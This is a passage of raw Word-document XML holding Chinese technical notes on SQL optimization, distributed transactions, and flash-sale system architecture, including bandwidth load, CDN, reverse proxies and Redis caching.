          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>、不要做无谓的排序操作，而应该使用索引完成排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>三、总结</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D63189" w:rsidRPr="00D63189" w:rsidRDefault="00D63189" w:rsidP="00D63189">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>数据库优化包括两个方面，一方面是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序优化，另一方面是数据库配置的优化。另外在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以通过以下语句来查看帮助</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63189">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进行优化：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5016" w:rsidRPr="00F41A4C" w:rsidRDefault="000F5016" w:rsidP="000F5016">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式事务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F5016" w:rsidRPr="00F41A4C" w:rsidRDefault="000F5016" w:rsidP="000F5016">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00843AB1" w:rsidRPr="00F621E5" w:rsidRDefault="00F621E5" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F621E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://blog.jobbole.com/89140/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B423E" w:rsidRPr="00F41A4C" w:rsidRDefault="001738AD" w:rsidP="001738AD">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="000B423E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>系统架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B04CF" w:rsidRPr="00F41A4C" w:rsidRDefault="00493BD6" w:rsidP="002B1880">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="006B04CF" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">.1  </w:t>
      </w:r>
      <w:r w:rsidR="006B04CF" w:rsidRPr="00F41A4C">
        <w:t>秒杀系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="006D6E0F" w:rsidP="006B04CF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么是秒杀系统？电商进行营销的一种方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="006D6E0F" w:rsidP="006B04CF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="006D6E0F" w:rsidP="006B04CF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存在问题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B04CF" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0106" w:rsidP="006B04CF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>影响原来的业务</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>时间短，并发访问量大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0106" w:rsidP="006B04CF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>应用、数据库负载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0106" w:rsidP="000B20AC">
      <w:pPr>
        <w:ind w:leftChars="170" w:left="1092" w:hangingChars="350" w:hanging="735"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>增加网络带宽：</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>200K</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（主要是商品图片大小），那么需要的网络和服务器带宽是</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2G</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>200K×10,000</w:t>
      </w:r>
      <w:r w:rsidR="006D6E0F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000B20AC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，超过原来正常业务的网络带宽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B423E" w:rsidRPr="00F41A4C" w:rsidRDefault="000B423E" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0106" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>应对策略：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0106" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0106" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>秒杀系统由商品页面和后端请求组成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0106" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0106" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>前端页面</w:t>
      </w:r>
      <w:r w:rsidR="0035210C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00651335" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>静态化，</w:t>
      </w:r>
      <w:r w:rsidR="0035210C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> CDN</w:t>
      </w:r>
      <w:r w:rsidR="0035210C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和反向代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547295" w:rsidRPr="00F41A4C" w:rsidRDefault="00547295" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>后端</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>请求：瓶颈在与后端</w:t>
      </w:r>
      <w:r w:rsidR="00243A4A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidR="00243A4A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00243A4A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D6E0F" w:rsidRPr="00F41A4C" w:rsidRDefault="00374901" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB00F6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>秒杀系统与原系统分离，进行单独部署</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB00F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00374901" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00CB2337" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>租用网络带宽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB00F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00087A96" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>很多请求都是恶意的，有些用户利用自制脚本</w:t>
      </w:r>
      <w:r w:rsidR="00C34C07" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：同个账号发送多个请求，多个账号发送多个请求</w:t>
      </w:r>
      <w:r w:rsidR="009379E9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，多个账号</w:t>
      </w:r>
      <w:r w:rsidR="00505552" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、不同发送多个请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00087A96" w:rsidRPr="00F41A4C" w:rsidRDefault="00F4213B" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>读多写少，适合用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>redis</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9686A" w:rsidRPr="00F41A4C" w:rsidRDefault="00B9686A" w:rsidP="00B9686A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B9686A" w:rsidRPr="00F41A4C" w:rsidRDefault="00B9686A" w:rsidP="00B9686A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00904058" w:rsidRPr="00F41A4C" w:rsidRDefault="00904058" w:rsidP="00B9686A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的基本原理为反向代理，反向代理（</w:t>
      </w:r>
